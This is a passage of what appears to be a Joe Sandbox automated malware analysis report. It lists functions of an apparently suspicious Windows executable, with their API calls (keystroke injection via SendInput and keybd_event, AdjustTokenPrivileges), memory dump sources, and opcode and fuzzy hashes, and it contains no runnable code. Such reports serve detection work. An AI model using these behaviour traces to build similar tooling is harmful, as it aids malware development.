                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 33631002-0
                                                                                                                                  • Opcode ID: 3e77ca0d75d4df1777568f5546f206691b48ed78434fceae1eb41b3ec77cd141
                                                                                                                                  • Instruction ID: 7202e471a23d50ef0a26846aa746b41237e8f0bb3951d32bd0ae52576820b59d
                                                                                                                                  • Opcode Fuzzy Hash: 3e77ca0d75d4df1777568f5546f206691b48ed78434fceae1eb41b3ec77cd141
                                                                                                                                  • Instruction Fuzzy Hash: E211A1B190122CBEE7208BA8DC45FAFBBBCEB08754F104655F901F7190D2B89E0597E1
                                                                                                                                  Function 00EBAFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • GetParent.USER32(?), ref: 00F1F4B5
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00EBADDD,?,?,?,00000006,?), ref: 00F1F52F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 314495775-0
                                                                                                                                  • Opcode ID: 74f8709fbf32ff56118c5400eaf4658816d200a8aae32032a15fa8e6407a5f31
                                                                                                                                  • Instruction ID: cd6ae3637ba216f9f9dadd74daadafef39ea901be45b8a38982453232c794722
                                                                                                                                  • Opcode Fuzzy Hash: 74f8709fbf32ff56118c5400eaf4658816d200a8aae32032a15fa8e6407a5f31
                                                                                                                                  • Instruction Fuzzy Hash: DC217131600105AFCB289F28D849AFB3BA6AB49374F1C5264F5359B2E2C7B05D52E750
                                                                                                                                  Function 00F0F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F1F352,?,?,?), ref: 00F0F115
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F0F0FB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1273190321-0
                                                                                                                                  • Opcode ID: ec134e0e4739cb644a30c542238ce6410fcdea7d54fbca4cdc6d8ede6a05c2bb
                                                                                                                                  • Instruction ID: f6d685fad672869b921a88e29e29f7f4a3c8cbe17cf7b77b1f4c5aeeceb72e96
                                                                                                                                  • Opcode Fuzzy Hash: ec134e0e4739cb644a30c542238ce6410fcdea7d54fbca4cdc6d8ede6a05c2bb
                                                                                                                                  • Instruction Fuzzy Hash: A701B131204208EBDB319F24DC45FAA7FA6FBC5364F180124F9155B2E1C7B19816FB90
                                                                                                                                  Function 00F0F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0F47D
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F1F42E,?,?,?,?,?), ref: 00F0F4A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3420055661-0
                                                                                                                                  • Opcode ID: 9ec23f4578161d674234b4147489b4116ecf81c8e3cb4e28a587d272550c686f
                                                                                                                                  • Instruction ID: 348958ccd90e0057c04b31dfc3c85627e60fe93f2df90bd8b3a5e07a7a675ac0
                                                                                                                                  • Opcode Fuzzy Hash: 9ec23f4578161d674234b4147489b4116ecf81c8e3cb4e28a587d272550c686f
                                                                                                                                  • Instruction Fuzzy Hash: 5CF0177681011CBFEB049F95DC099AE7BB8FF44351F14401AFA02A2160D3B5AA56ABA0
                                                                                                                                  Function 00EED712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00EFC2E2,?,?,00000000,?), ref: 00EED73F
                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00EFC2E2,?,?,00000000,?), ref: 00EED751
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 6ac274991ddf6286c01436cdc28bda5786ef696ff06cf45f52a15991f8d545f7
                                                                                                                                  • Instruction ID: 34283e00016671f8e53f6107d865c49ad39e87ff357cc09862a38fb4c9b3bb62
                                                                                                                                  • Opcode Fuzzy Hash: 6ac274991ddf6286c01436cdc28bda5786ef696ff06cf45f52a15991f8d545f7
                                                                                                                                  • Instruction Fuzzy Hash: 0CF0A03510432DBBDB21AFA4CC49FEA7BACFF49361F008116B919E6181D730DA40DBA0
                                                                                                                                  Function 00EE4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00EE4B89
                                                                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00EE4B9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                  • Opcode ID: c838e181f08d9f46a38736ed2b59cfedd7046eef81328d45661d33b1e6119ee7
                                                                                                                                  • Instruction ID: dff41e243f17514e2babc1a0e12042c06c5e6af678191638c30ed578e2a19f40
                                                                                                                                  • Opcode Fuzzy Hash: c838e181f08d9f46a38736ed2b59cfedd7046eef81328d45661d33b1e6119ee7
                                                                                                                                  • Instruction Fuzzy Hash: 4DF0907080038DAFDB058FA1C806BBE7BB4EF00305F048409F951A51D1D3B9C612EF90
                                                                                                                                  Function 00EDB8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EDB9EC), ref: 00EDB8C5
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00EDB9EC), ref: 00EDB8D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                  • Opcode ID: b6099a6959f646213df55db4f935dc97f3abd1ca73721c9228e05dcbbcd20d2f
                                                                                                                                  • Instruction ID: 3ad35a72c2bf48e33a3b4aea86ad848dda328bb6d0d266c4a128bb01bdb560b0
                                                                                                                                  • Opcode Fuzzy Hash: b6099a6959f646213df55db4f935dc97f3abd1ca73721c9228e05dcbbcd20d2f
                                                                                                                                  • Instruction Fuzzy Hash: 4DE0EC72014611EFE7262B64ED09E77BBEDEF04311B15982EF49691470DB62ACD2EB10
                                                                                                                                  Function 00F0F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00F0F59C
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F1F3AD,?,?,?,?), ref: 00F0F5C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 52b4748b50cd51178028c3a4906b329adadab06558ece74cf9019c758f4ea3a5
                                                                                                                                  • Instruction ID: aceeb3d7c46e4b138f217e1ebcdb86da87aadac780277267b9bcddeb6d567c0e
                                                                                                                                  • Opcode Fuzzy Hash: 52b4748b50cd51178028c3a4906b329adadab06558ece74cf9019c758f4ea3a5
                                                                                                                                  • Instruction Fuzzy Hash: FCE08C3110421CBBEB240F09DC0AFB93B18EB00B60F248526F91A880E0D7B088A1F6A0
                                                                                                                                  Function 00EC8E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00EA125D,00EC7A43,00EA0F35,?,?,00000001), ref: 00EC8E41
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EC8E4A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: 03f6a3c3e9b774fe37e32f09d4d2d6841021d24a89d3a7902f6df1ecd9c15cc9
                                                                                                                                  • Instruction ID: 8f56213490276f03b1ce94e14cf1243b94e6fbfc871e3dc245b47ebc2f214287
                                                                                                                                  • Opcode Fuzzy Hash: 03f6a3c3e9b774fe37e32f09d4d2d6841021d24a89d3a7902f6df1ecd9c15cc9
                                                                                                                                  • Instruction Fuzzy Hash: D7B09271044A0CABFA106BA1EC09B983F68EB08A62F004010F61D440608B635852AA93
                                                                                                                                  Function 00ED113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ba823db9a0234116d90d7e1725e37269e9f84abac185e8950dcdeccd2031c5be
                                                                                                                                  • Instruction ID: 62ba14593de8aece604d6ce2bce0278020fb0974df4647cd3e2471c01ebd4bc2
                                                                                                                                  • Opcode Fuzzy Hash: ba823db9a0234116d90d7e1725e37269e9f84abac185e8950dcdeccd2031c5be
                                                                                                                                  • Instruction Fuzzy Hash: A1B12360D2AF454DC72396398931336B64DAFFB6D5F91D71BFC2A74E22EB2281835180
                                                                                                                                  Function 00F102AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00F10352
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: ca5c7b8d76964918dfc4a67ecf139b43a01ae61f5c5af28fa632be5c176b784e
                                                                                                                                  • Instruction ID: 27808570e7d26c3bc0eb63c8e814fe095c0ff79700d841f9b19f12fd126a8c07
                                                                                                                                  • Opcode Fuzzy Hash: ca5c7b8d76964918dfc4a67ecf139b43a01ae61f5c5af28fa632be5c176b784e
                                                                                                                                  • Instruction Fuzzy Hash: 9C112731244259ABFB251B288C45FF93614EB41770F248314F9319A1E2CEF44DD1F2A5
                                                                                                                                  Function 00F0E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB155: GetWindowLongW.USER32(?,000000EB), ref: 00EBB166
                                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00F0E7AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4084987330-0
                                                                                                                                  • Opcode ID: 4118989088cbf8fdb3135adc54a693a166223b507acd389874b7dd846b6405c3
                                                                                                                                  • Instruction ID: 450ae00957023ae9b83c662006f3c5481472a615d4f3e1f954f36197abf74791
                                                                                                                                  • Opcode Fuzzy Hash: 4118989088cbf8fdb3135adc54a693a166223b507acd389874b7dd846b6405c3
                                                                                                                                  • Instruction Fuzzy Hash: B2F0373220010CEFCF19AF54EC409BA3BAAFB08320B048914FD258B2A1C7729D71FB90
                                                                                                                                  Function 00F0EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                    • Part of subcall function 00EBB736: GetCursorPos.USER32(000000FF), ref: 00EBB749
                                                                                                                                    • Part of subcall function 00EBB736: ScreenToClient.USER32(00000000,000000FF), ref: 00EBB766
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000001), ref: 00EBB78B
                                                                                                                                    • Part of subcall function 00EBB736: GetAsyncKeyState.USER32(00000002), ref: 00EBB799
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00F1F417,?,?,?,?,?,00000001,?), ref: 00F0EA9C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2356834413-0
                                                                                                                                  • Opcode ID: 4a28fd1c5703b90cbe224ec839931c7f598c693469c156f222a58cc20c486173
                                                                                                                                  • Instruction ID: a0ececc9d164a808c30dee1239e2c7715c09302c6573a85c758c61aa9fb8edac
                                                                                                                                  • Opcode Fuzzy Hash: 4a28fd1c5703b90cbe224ec839931c7f598c693469c156f222a58cc20c486173
                                                                                                                                  • Instruction Fuzzy Hash: 0BF08231200229ABDB14AF15CC06ABA3BA1FB04750F044015F9165B191D7B69871FBD1
                                                                                                                                  Function 00EBB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00EBAF40,?,?,?,?,?), ref: 00EBB83B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
